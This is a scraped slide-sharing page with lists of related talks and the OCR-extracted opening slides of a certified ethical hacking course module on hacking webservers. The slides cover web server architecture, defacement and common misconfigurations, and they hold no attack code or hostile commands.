Ceh v8 labs module 19 cryptographyMehrdad Jingoism
 
Ceh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hackingCeh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hackingMehrdad Jingoism
 
Ceh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffersCeh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffersMehrdad Jingoism
 
Tarea vi de medios y recursos didacticos
Tarea vi de medios y recursos didacticosTarea vi de medios y recursos didacticos
Tarea vi de medios y recursos didacticos19943812
 
Ceh v8 labs module 14 sql injection
Ceh v8 labs module 14 sql injectionCeh v8 labs module 14 sql injection
Ceh v8 labs module 14 sql injectionMehrdad Jingoism
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationMehrdad Jingoism
 

Destacado (20)

Ce hv8 module 03 scanning networks
Ce hv8 module 03 scanning networksCe hv8 module 03 scanning networks
Ce hv8 module 03 scanning networks
 
Ce hv8 module 10 denial of service
Ce hv8 module 10 denial of serviceCe hv8 module 10 denial of service
Ce hv8 module 10 denial of service
 
Ce hv8 module 09 social engineering
Ce hv8 module 09 social engineeringCe hv8 module 09 social engineering
Ce hv8 module 09 social engineering
 
Ce hv8 module 11 session hijacking
Ce hv8 module 11 session hijackingCe hv8 module 11 session hijacking
Ce hv8 module 11 session hijacking
 
Ce hv8 module 02 footprinting and reconnaissance
Ce hv8 module 02 footprinting and reconnaissanceCe hv8 module 02 footprinting and reconnaissance
Ce hv8 module 02 footprinting and reconnaissance
 
Ce hv8 module 06 trojans and backdoors
Ce hv8 module 06 trojans and backdoorsCe hv8 module 06 trojans and backdoors
Ce hv8 module 06 trojans and backdoors
 
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking
 
Ce hv8 module 07 viruses and worms
Ce hv8 module 07 viruses and wormsCe hv8 module 07 viruses and worms
Ce hv8 module 07 viruses and worms
 
Ce hv8 module 04 enumeration
Ce hv8 module 04 enumerationCe hv8 module 04 enumeration
Ce hv8 module 04 enumeration
 
Ce hv8 module 19 cryptography
Ce hv8 module 19 cryptographyCe hv8 module 19 cryptography
Ce hv8 module 19 cryptography
 
Ce hv8 module 20 penetration testing
Ce hv8 module 20 penetration testingCe hv8 module 20 penetration testing
Ce hv8 module 20 penetration testing
 
Ceh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and wormsCeh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and worms
 
Legacy Project
Legacy ProjectLegacy Project
Legacy Project
 
Ceh v8 labs module 02 footprinting and reconnaissance
Ceh v8 labs module 02 footprinting and reconnaissanceCeh v8 labs module 02 footprinting and reconnaissance
Ceh v8 labs module 02 footprinting and reconnaissance
 
Ceh v8 labs module 19 cryptography
Ceh v8 labs module 19 cryptographyCeh v8 labs module 19 cryptography
Ceh v8 labs module 19 cryptography
 
Ceh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hackingCeh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hacking
 
Ceh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffersCeh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffers
 
Tarea vi de medios y recursos didacticos
Tarea vi de medios y recursos didacticosTarea vi de medios y recursos didacticos
Tarea vi de medios y recursos didacticos
 
Ceh v8 labs module 14 sql injection
Ceh v8 labs module 14 sql injectionCeh v8 labs module 14 sql injection
Ceh v8 labs module 14 sql injection
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumeration
 

Similar a Ce hv8 module 12 hacking webservers

Web Application Scanning 101
Web Application Scanning 101Web Application Scanning 101
Web Application Scanning 101Sasha Nunke
 
Module 11 (hacking web servers)
Module 11 (hacking web servers)Module 11 (hacking web servers)
Module 11 (hacking web servers)Wail Hassan
 
Ceh v8 labs module 13 hacking web applications
Ceh v8 labs module 13 hacking web applicationsCeh v8 labs module 13 hacking web applications
Ceh v8 labs module 13 hacking web applicationsMehrdad Jingoism
 
Ce hv8 module 18 buffer overflow
Ce hv8 module 18 buffer overflowCe hv8 module 18 buffer overflow
Ce hv8 module 18 buffer overflowMehrdad Jingoism
 
Minor Mistakes In Web Portals
Minor Mistakes In Web PortalsMinor Mistakes In Web Portals
Minor Mistakes In Web Portalsmsobiegraj
 
27.2.12 lab interpret http and dns data to isolate threat actor
27.2.12 lab   interpret http and dns data to isolate threat actor27.2.12 lab   interpret http and dns data to isolate threat actor
27.2.12 lab interpret http and dns data to isolate threat actorFreddy Buenaño
 
Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)Wail Hassan
 
Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotJeremiah Grossman
 
How not to suck at Cyber Security
How not to suck at Cyber SecurityHow not to suck at Cyber Security
How not to suck at Cyber SecurityChris Watts
 
Best Practices to Mitigate from the Emerging Vectors of Network Attack
Best Practices to Mitigate from the Emerging Vectors of Network AttackBest Practices to Mitigate from the Emerging Vectors of Network Attack
Best Practices to Mitigate from the Emerging Vectors of Network AttackAmazon Web Services
 
Cognitive Security - Anatomy of Advanced Persistent Threats ('12)
Cognitive Security - Anatomy of Advanced Persistent Threats ('12)Cognitive Security - Anatomy of Advanced Persistent Threats ('12)
Cognitive Security - Anatomy of Advanced Persistent Threats ('12)Gabriel Dusil
 
Web Intrusion Detection
Web Intrusion Detection Web Intrusion Detection
Web Intrusion Detection Abhishek Singh
 
Google Analytics blog support
Google Analytics blog supportGoogle Analytics blog support
Google Analytics blog supportmassiveans
 
Patch Tuesday for January 2020
Patch Tuesday for January 2020Patch Tuesday for January 2020
Patch Tuesday for January 2020Ivanti
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityChris Hillman
 
August Patch Tuesday Analysis
August Patch Tuesday AnalysisAugust Patch Tuesday Analysis
August Patch Tuesday AnalysisIvanti
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdfssuser01066a
 
March 2019 Patch Tuesday Analysis
March 2019 Patch Tuesday AnalysisMarch 2019 Patch Tuesday Analysis
March 2019 Patch Tuesday AnalysisIvanti
 

Similar a Ce hv8 module 12 hacking webservers (20)

Web Application Scanning 101
Web Application Scanning 101Web Application Scanning 101
Web Application Scanning 101
 
Module 11 (hacking web servers)
Module 11 (hacking web servers)Module 11 (hacking web servers)
Module 11 (hacking web servers)
 
Ceh v8 labs module 13 hacking web applications
Ceh v8 labs module 13 hacking web applicationsCeh v8 labs module 13 hacking web applications
Ceh v8 labs module 13 hacking web applications
 
Ce hv8 module 18 buffer overflow
Ce hv8 module 18 buffer overflowCe hv8 module 18 buffer overflow
Ce hv8 module 18 buffer overflow
 
Minor Mistakes In Web Portals
Minor Mistakes In Web PortalsMinor Mistakes In Web Portals
Minor Mistakes In Web Portals
 
27.2.12 lab interpret http and dns data to isolate threat actor
27.2.12 lab   interpret http and dns data to isolate threat actor27.2.12 lab   interpret http and dns data to isolate threat actor
27.2.12 lab interpret http and dns data to isolate threat actor
 
Hacking3e ppt ch09
Hacking3e ppt ch09Hacking3e ppt ch09
Hacking3e ppt ch09
 
Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)
 
Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security Forgot
 
How not to suck at Cyber Security
How not to suck at Cyber SecurityHow not to suck at Cyber Security
How not to suck at Cyber Security
 
Web Security
Web SecurityWeb Security
Web Security
 
Best Practices to Mitigate from the Emerging Vectors of Network Attack
Best Practices to Mitigate from the Emerging Vectors of Network AttackBest Practices to Mitigate from the Emerging Vectors of Network Attack
Best Practices to Mitigate from the Emerging Vectors of Network Attack
 
Cognitive Security - Anatomy of Advanced Persistent Threats ('12)
Cognitive Security - Anatomy of Advanced Persistent Threats ('12)Cognitive Security - Anatomy of Advanced Persistent Threats ('12)
Cognitive Security - Anatomy of Advanced Persistent Threats ('12)
 
Web Intrusion Detection
Web Intrusion Detection Web Intrusion Detection
Web Intrusion Detection
 
Google Analytics blog support
Google Analytics blog supportGoogle Analytics blog support
Google Analytics blog support
 
Patch Tuesday for January 2020
Patch Tuesday for January 2020Patch Tuesday for January 2020
Patch Tuesday for January 2020
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
August Patch Tuesday Analysis
August Patch Tuesday AnalysisAugust Patch Tuesday Analysis
August Patch Tuesday Analysis
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf
 
March 2019 Patch Tuesday Analysis
March 2019 Patch Tuesday AnalysisMarch 2019 Patch Tuesday Analysis
March 2019 Patch Tuesday Analysis
 

Último

Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024D Cloud Solutions
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Commit University
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024SkyPlanner
 
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsSafe Software
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarPrecisely
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesMd Hossain Ali
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8DianaGray10
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsSeth Reyes
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IES VE
 
How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?IES VE
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UbiTrack UK
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfDianaGray10
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...DianaGray10
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...Aggregage
 
20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-pyJamie (Taka) Wang
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Will Schroeder
 

Último (20)

Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024
 
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity Webinar
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
 
20150722 - AGV
20150722 - AGV20150722 - AGV
20150722 - AGV
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8
 
20230104 - machine vision
20230104 - machine vision20230104 - machine vision
20230104 - machine vision
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and Hazards
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
 
How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptx
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
 
20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-py
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 

Ce hv8 module 12 hacking webservers

  • 1. H a c k in g W e b s e r v e rs Module 12
  • 2. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Hacking Webservers Module 12 En g in e e red by Hackers. Pre se n te d by Professio nals. E th ic a l H a c k in g a n d C o u n te r m e a s u r e s v8 M odule 12: Hacking Webservers Exam 312-50 Module 12 Page 1601 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 3. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker GoDaddy Outage Takes Down Millions of Sites, Anonymous Member Claim s Responsibility Monday, September 10th, 2012 Final update: GoDaddy is up, and claims th a t the outage was due to internal errors and not a DD0S attack. According to many customers, sites hosted by major web host and domain registrar GoDaddy are down. According to the official GoDaddy Tw itter account the company is aware o f the issue and is working to resolve it. Update: customers are com plaining tha t GoDaddy hosted e-mail accounts are down as well, along w ith GoDaddy phone service and all sites using GoDaddy's DNS service. Update 2: A m em ber o f Anonymous known as AnonymousOwn3r is claiming responsibility, and makes it clear this is not an Anonymous collective action. A tipste r tells us tha t the technical reason fo r the failure is being caused by the inaccessibility o f GoDaddy's DNS servers — specifically CNS1.SECURESERVER.NET, CNS2.SECURESERVER.NET, and CNS3.SECURESERVER.NET are failing to resolve. http://techcrunch.com Copyright © by E - * n i . All Rights Reserved. Reproduction is Strictly Prohibited. GGacl S ecurity N ew s Nnus GoD addy O utage T akes Down M illions of Sites, Anonym ous M em ber C laim s R esponsibility Source: http://techcrunch.com Final update: GoDaddy is up, and claims that the outage was due to internal errors and not a DD0 S attack. According to many customers, sites hosted by major web host and domain registrar GoDaddy are down. According to the official GoDaddy Twitter account, the company is aware of the issue and is working to resolve it. Update: Customers are complaining that GoDaddy hosted e-mail accounts are down as well, along with GoDaddy phone service and all sites using GoDaddy's DNS service. Update 2: A member of Anonymous known as AnonymousOwn3r is claiming responsibility, and makes it clear this is not an Anonymous collective action. A tipster tells us that the technical reason for the failure is being caused by the inaccessibility of GoDaddy's DNS servers - specifically CNS1.SECURESERVER.NET, CNS2.SECURESERVER.NET, and CNS3.SECURESERVER.NET are failing to resolve. Module 12 Page 1602 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 4. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker AnonymousOwn3r‫׳‬s bio reads "Security leader of #Anonymous (‫ ”׳‬Official m em ber")." The individual claims to be from Brazil, and hasn't issued a statement as to why GoDaddy was targeted. Last year GoDaddy was pressured into opposing SOPA as customers transferred domains off the service, and the company has been the center of a few other controversies. However, AnonymousOwn3r has tweeted "I'm not anti go daddy, you guys will understand because i did this attack." Copyright © 2012 AOL Inc. By Klint Finley http://techcrunch.com/2012/09/10/godaddy-outage-takes-down-millions-of-sites/ Module 12 Page 1603 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 5. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Module Objectives CEH Urt1fW4 J IIS Webserver Architecture J Countermeasures J W hy W eb Servers are Compromised? J J Impact of Webserver Attacks How to Defend Against Web Server Attacks J Webserver Attacks J Patch Management J Webserver Attack Methodology J Patch Management Tools J Webserver Attack Tools J Webserver Security Tools J Metasploit Architecture J Webserver Pen Testing Tools J Web Password Cracking Tools J ttlMUl ttMhM Webserver Pen Testing ‫ ־־‬L / ^ Copyright © by IG-COHCil. All Rights Reserved. Reproduction is Strictly Prohibited. ^ M odule O b jectiv e s •—* > Often, a breach in security causes more damage in terms of goodwill than in actual quantifiable loss. This makes web server security critical to the normal functioning of an organization. Most organizations consider their web presence to be an extension of themselves. This module attempts to highlight the various security concerns in the context of webservers. After finishing this module, you will able to understand a web server and its architecture, how the attacker hacks it, what the different types attacks that attacker can carry out on the web servers are, tools used in web server hacking, etc. Exploring web server security is a vast domain and to delve into the finer details of the discussion is beyond the scope of this module. This module makes you familiarize with: e IIS Web Server Architecture e e W hy W eb Servers Are Compromised? e e Webserver Attacks e Webserver Attack Methodology Q Webserver Attack Tools e Metasploit Architecture e Web Password Cracking Tools Module 12 Page 1604 How to Defend Against W eb Server Attacks Impact of Webserver Attacks e Countermeasures e Patch Management 0 Patch Management Tools e W ebserver Security Tools e W ebserver Pen Testing Tools e W ebserver Pen Testing Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 6. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Module Flow CEH Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. M o d u l e F lo w To understand hacking web servers, first you should know what a web server is, how it functions, and what are the other elements associated with it. All these are simply termed web server concepts. So first we will discuss about web server concepts. 4 m) Webserver Attacks Webserver Concepts ------ Attack Methodology * Webserver Pen Testing y Patch Management Webserver Attack Tools Webserver Security Tools ■— ■— Counter-measures This section gives you brief overview of the web server and its architecture. It will also explain common reasons or mistakes made that encourage attackers to hack a web server and become successful in that. This section also describes the impact of attacks on the web server. Module 12 Page 1605 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 7. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Webserver Market Shares I ______ I ______ I _______I_______ I _______I _ _ _ _ 64.6% Apache Microsoft - IIS LiteSpeed I 1.7% Google Server | 1.2% W eb S e rv e r M a rk e t S h a re s Source: http://w3techs.com The following statistics shows the percentages of websites using various web servers. From the statistics, it is clear that Apache is the most commonly used web server, i.e., 64.6%. Below that Microsoft ‫ ־‬IIS server is used by 17.4 % of users. Module 12 Page 1606 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 8. Ethical Hacking and Countermeasures Hacking Webservers Apache Exam 312-50 Certified Ethical Hacker t ‫כ‬ 64.6% 17.4% Microsoft ‫ ־‬IIS 13% Nginx LiteSpeed Google Server Tomcat Lighttpd 10 20 30 40 50 60 70 ‫־‬J -----► 80% FIGURE 12.1: Web Server Market Shares Module 12 Page 1607 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 9. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker CEH Open Source W ebserver Architecture Site Users Site Admin Attacks r :1 a 1 I □ © Linux 1 File System ^ ......... I— *‫—־‬ I Apache Email ‫י ג יני מ‬ PHP Applications ‫י‬ Compiled Extension MySQL i f Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. B O p e n S o u rc e W e b S e rv e r A rc h ite c tu re The diagram bellow illustrates the basic components of open source web server architecture. Module 12 Page 1608 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 10. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Site Users Site Admin ‫־׳‬ *A & Attacks 1 U Internet Linux File System J "‫־‬ Apache V Email PHP f Applications Compiled Extension MySQL y FIGURE 12.2: Open Source Web Server Architecture Where, © Linux - the server's operating system © Apache - the web server component © MySQL - a relational database © PHP - the application layer Module 12 Page 1609 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 11. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker IIS Web Server Architecture Internet Information Services (IIS) for Windows Client i * a C H IE HTTP Protocol Stack (HTTP.SYS) f t p Server is a flexible, secure, and easy-to-manage web server for hosting anything on the web Kernel Mode User Mode Svchost.exe :■ + Windows Activation Service _________ (WAS)__________ Application Pool Web Server Core Native Modules AppDomain Begin request processing, authentication, authorization, cache resolution, handler mapping, handler preexecution, release state, update cache, update log, and end request processing Anonymous authentication, managed engine, IIS certificate mapping, static file, default document, HTTP cache, HTTP errors, and HTTP logging Managed Modules WWW Service External Apps application Host.config Forms Authentication Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. IIS W e b S e r v e r A r c h i t e c t u r e ‫3׳‬ c3 by ----- ---------------------------------IIS, also known as Internet Information Service, is a web server application developed Microsoft that can be used with Microsoft Windows. This is the second largest web after Apache HTTP server. IT occupies around 17.4% of the total market share. It supports HTTP, HTTPS, FTP, FTPS, SMTP, and NNTP. The diagram that follows illustrates the basic components of IIS web server architecture: Module 12 Page 1610 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 12. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Client HTTP Protocol Stack (HTTP.SYSI In ternet Kernel M o d e User Mode Svchost.exe A pplication Pool W in d o w s A ctiva tio n S e rv ice (W A S ) N ative M od ules W e b S erver Core AppD om ain Anonymous authentication, Managed engine, IIS certificate mapping, static file, default document, HTTP cache, HTTP errors, and HTTP logging Managed M odules WWW Service Begin requestprocessing/ authentication, authorization, cache resolution, handler mapping, handler pre* execution, release state, application Host.config update cache, update log, and end request processing Forms A uthentication FIGURE 12.3: IIS Web Server Architecture Module 12 Page 1611 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 13. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Website Defacement J Web defacement occurs when an intruder maliciously alters Fie M l‫ז‬ * fe w * CEH Hep W © http://juggyboy.com/index.aspx v ‫^ ד‬ •j_> ‫־‬ visual appearance of a web page by inserting or substituting provocative and frequently offending data J Y o u a re O W N E D ! ! ! ! ! ! ! Defaced pages exposes visitors to some propaganda or misleading information until the unauthorized change is discovered and corrected H A C K E D ! Hi M aster, Your w e b s ite o w n e d by US, H acker! N ext ta rg et - m icrosoft.com Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. W ebsite D e facem en t Website defacement is a process of changing the content of a website or web page by hackers. Hackers break into the web servers and will alter the hosted website by creating something new. W eb defacement occurs when an intruder maliciously alters the visual appearance of a web page by inserting or substituting provocative and frequently offensive data. Defaced pages expose visitors to propaganda or misleading information until the unauthorized change is discovered and corrected. Module 12 Page 1612 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 14. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker BO ® World Wide Web File Edit View Help , ‫יי‬ FIGURE 12.4: Website Defacement Module 12 Page 1613 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 15. Ethical Hacking and Countermeasures Hacking Webservers Unnecessary default, backup, or sample files Security conflicts with business ease-ofuse case Misconfigurations in web server, operating systems, and networks Lack of proper security policy, procedures, and maintenance Bugs in server software, OS, and web applications Improper authentication with external systems Administrative or debugging functions that are enabled or accessible Exam 312-50 Certified Ethical Hacker Installing the server with default settings Improper file and directory permissions Default accounts with their default or no passwords Security flaws in the server software, OS and applications Misconfigured SSL certificates and encryption settings Use of self-signed certificates and default certificates Unnecessary services enabled, including content management and remote administration Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. W h y W e b S e r v e r s A re C o m p r o m i s e d There are inherent security risks associated with web servers, the local area networks that host web sites and users who access these websites using browsers. 0 W ebm aster's Concern: From a webmaster's perspective, the biggest security concern is that the web server can expose the local area network (LAN) or the corporate intranet to the threats the Internet poses. This may be in the form of viruses, Trojans, attackers, or the compromise of information itself. Software bugs present in large complex programs are often considered the source of imminent security lapses. However, web servers that are large complex devices and also come with these inherent risks. In addition, the open architecture of the web servers allows arbitrary scripts to run on the server side while replying to the remote requests. Any CGI script installed at the site may contain bugs that are potential security holes. Q Network Administrator's Concern: From a network administrator's perspective, a poorly configured web server poses another potential hole in the local network's security. W hile the objective of a web is to provide controlled access to the network, too much of control can make a web almost impossible to use. In an intranet environment, the network administrator has to be careful about configuring the web server, so that the legitimate users are recognized and authenticated, and various groups of users assigned distinct access privileges. Module 12 Page 1614 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All 